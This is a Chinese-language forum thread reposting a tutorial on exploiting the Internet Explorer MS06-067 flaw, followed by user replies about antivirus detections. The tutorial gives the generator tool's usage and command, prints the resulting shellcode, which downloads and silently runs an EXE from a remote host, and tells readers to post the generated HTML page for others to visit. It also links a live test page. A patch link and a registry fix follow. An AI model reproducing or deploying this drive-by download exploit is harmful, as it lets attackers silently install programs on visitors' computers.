【警告】【转贴】令人汗颜的IE最新漏洞（MS06-067）利用测试(黑吧)

[proll]

這個的出現,預示新的網馬即將大大出手了!!!!!!!

令人汗顏的IE最新漏洞（MS06-067）利用測試

作者：IceskYsl@1st
來源：http://www.1steam.cn
申明：測試使用，請勿於非法用途，轉載請註明出處！

這個漏洞太恐怖了，恐怖的讓我不敢寫出來，考慮到馬上網上這樣的工具都會氾濫，還是提前告訴大家比較好，我不詳細的利用過程，如果你接觸過類似的，肯定是會使用的，再次奉勸大家，測試為主，不要亂掛馬，危害他人！

受影響的系統：
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003（用於基於 Itanium 的系統）
Microsoft Windows Server 2003 SP1（用於基於 Itanium 的系統）
Microsoft Windows Server 2003 x64 Edition

受影響軟件：
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4

不受影響軟件：
Internet Explorer 7
－－－－－－－－－－－－－

利用過程如下，剛才寫的時候突然斷網，重新寫一次，鬱悶。。

1、首先把一個你需要運行的EXE文件放在網上，得到地址： http://www.1steam.cn/tools/jhzj.exe（我這裡測試用的是按鈕突破專家）。

2、接著看下這個生成工具（LION提供的，謝）的使用方法：

QUOTE:

Usage: e:/ms_exp/06067/ms06067.exe <URL> [htmlfile]

<URL>－－就是你的EXE的路徑，如我這裡的「按鈕突破專家」的地址：
[htmlfile]－－需要生成的HTML文件的名稱，如我這裡的1st.html

3、生成過程，按照上面的格式就可以生成了，過程如下：

QUOTE:
E:\Ms_exp\06067>ms06067 http://www.1steam.cn/tools/jhzj.exe 1st.html
[+] download url:http://www.1steam.cn/tools/jhzj.exe
[+] exploit file:1st.html
"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c"
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000"
"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516"
"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456"
"%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300"
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856"
"%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56"
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be"
"%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775"
"%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd"
"%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e"
"%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a"
"%u6870%u7474%u3a70%u2f2f%u7777%u2e77%u7331%u6574"
"%u6d61%u632e%u2f6e%u6f74%u6c6f%u2f73%u686a%u6a7a"
"%u652e%u6578%u0000";
[+] exploit write to 1st.html success!


看到這句：[+] exploit write to 1st.html success!就說明成功了。可以去ms06067.exe的目錄下，看到生成的HTML文件1st.html。
4、把這個HTML文件放在網上，給人家訪問就可以了，我這裡的這個測試網頁地址在：
http://www.1steam.cn/modiy/1st.html要测试就打开这个网页，无毒。　，你可以打開看看效果，如果你能看到運行的「按鈕突破專家」，說明成功。

5、修補
官方已經除了補丁，地址在：http://www.microsoft.co.ke/china/tec.../MS06-067.mspx。

或者修補如下（LION提供的，再謝）：
請將以下文本粘貼於記事本等文本編輯器中。然後，使用.reg文件擴展名保存文件：

QUOTE:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\ActiveX Compatibility\{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}]
"Compatibility Flags"=dword:00000400


雙擊此.reg文件將其應用到各個系統。

PS：這個漏洞，運行EXE不閃，也不彈窗，不聲不響的，太恐怖了

[proll]

打開網頁後，過一段時間看看 桌面上是否會有一個exe文檔。

[DarkSkyline]

點選 http://www.1steam.cn/modiy/1st.html 這個網頁,我的"AntiVir PersonalEdition Premium" 11/27日病毒碼找到 [EXP/CVE-2006-4777],馬上偵測到有問題,立刻攔截下來,所以我的電腦沒有中IE漏洞...

PS:沒有開啟發式就找到了~

[剛接觸的新手]

不能這樣解釋吧...
我的kis6.0也是阻擋了此漏洞運用，但不代表沒有此漏洞存在。

[t105]

使用防毒軟體為 Norton AntiVirus 2005 、NOD32 2.51.26 、Avast! Professional 4.7.892 。


詳細檢查的結果！




Norton AntiVirus 2005 查的結果 ！ 病毒碼 2006.11.27 編號 第 50 級


詳細資料: 已攔截偵測到的入侵行為。所有跟 www.1steam.cn(222.173.123.110) 的通訊將會被攔截 30 分鐘。


詳細資料: 已偵測到嚐試存取您機器的入侵 "HTTP DirectAnimation KeyFrame Heap BO" 並攔截。
入侵者: www.1steam.cn(222.173.123.110)(http(80))。
風險等級: 高。
通訊協定: TCP。
遭到攻擊的 IP192.168.1.21)。
遭到攻擊的通訊埠: 1663。


已攔截成功！

[schumacher]

系統已偵測並攔截到嘗試對您的電腦所發出的「HTTP DirectAnimation KeyFrame Heap BO」入侵行為。
入侵者：proxy.....tw(210....)(http-proxy(8080))。
風險等級：高。
通訊協定：TCP。
遭到攻擊的 IP：localhost。
遭到攻擊的通訊埠：1371。

已偵測並攔截的入侵行為。所有與 proxy.....tw(210....) 進行的通訊將會被攔截 480 分鐘。

SCS 3.1 防火牆攔截成功 ^^

而且我在11月16日就已經下載更新KB922760...

[proll]

應當關閉防火牆進行測試噢

[star000star]

打開之後就白白的，桌面上什麼事情也沒發生，也沒有防護軟體跳出警告，這是什麼情況Orz。

[baba_yu]

AVK 2006 直接封整個網站任何毒都進不來

[k7system]

點選 http://www.1steam.cn/modiy/1st.html 這個網頁,我的"AntiVir PersonalEdition Premium" 11/27日病毒碼找到 [EXP/CVE-2006-4777],馬上偵測到有問題,立刻攔截下來,所以我的電腦沒有中IE漏洞...

PS:沒有開啟發式就找到了~

我用的是Antivir Classic版，瀏覽器是Firefox 2，
也是一樣點了那個.exe結尾的網址後，
就自動跳出來說抓到一個病毒。